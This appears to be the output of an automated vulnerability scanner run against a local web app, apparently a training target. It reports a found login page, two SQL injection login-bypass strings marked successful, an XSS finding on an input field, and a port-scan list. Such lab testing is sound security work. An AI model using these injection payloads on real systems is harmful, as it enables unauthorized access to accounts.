Report for localhost:3000
IP is 127.0.0.1
Port is 3000

========================================
Find login page
========================================
Connecting to http://127.0.0.1:3000
Login page found at http://127.0.0.1:3000/#/login

========================================
SQL injection
========================================
SQL injection successful with username "' OR TRUE; --" and password "password to fill place")
SQL injection successful with username "' OR id=1; --" and password "password to fill place")

========================================
XSS attack
========================================
Successful XSS attack on input of id: mat-input-0
This input was present in : [http://127.0.0.1:3000/#/photo-wall, http://127.0.0.1:3000/#/about, http://127.0.0.1:3000/#/contact, http://127.0.0.1:3000/#/login]

========================================
Port scan
========================================
Opened ports: [1075, 1505, 2680, 3000, 3103, 3314, 3792, 3834, 5320, 5432, 5853, 6150, 6942, 7010, 7565, 8021, 8558, 9155, 9514, 9776, 10706, 10841, 11065, 11219, 12341, 12362, 12527, 12924, 13572, 14218, 15781, 17190, 17836, 18025, 19930, 20383, 21445, 21522, 21538, 22510, 22990, 23970, 25026, 25318, 25799, 26075, 27269, 30172, 30196, 30263, 30752, 30898, 31742, 32174, 32667, 33023, 33300, 33450, 34899, 36330, 36416, 36728, 36872, 37225, 38129, 39051, 39124, 39496, 39528, 41392, 41512, 41696, 42153, 43600, 44141, 44311, 44916, 45454, 45991, 46154, 47665, 48138, 48261, 48294, 49343, 49376, 49664, 49943, 50433, 50712, 51444, 51734, 51904, 52285, 52580, 52700, 52881, 53088, 53367, 53651, 54391, 54671, 55185, 55479, 56485, 56628, 56761, 57413, 57705, 57958, 58172, 58226, 58468, 58941, 59516, 59807, 59837, 60619, 60655, 60902, 60936, 60982, 61030, 61077, 61127, 61228, 61281, 61310, 61363, 61388, 61441, 61541, 61593, 61652, 61706, 61755, 61810, 61892, 62280, 62422, 62578, 62717, 62960, 63259, 63342, 63595, 64116, 64418, 64555, 64798, 64841, 65066, 65460]

========================================
Rainbow table attack
========================================

========================================
DOS attack
========================================
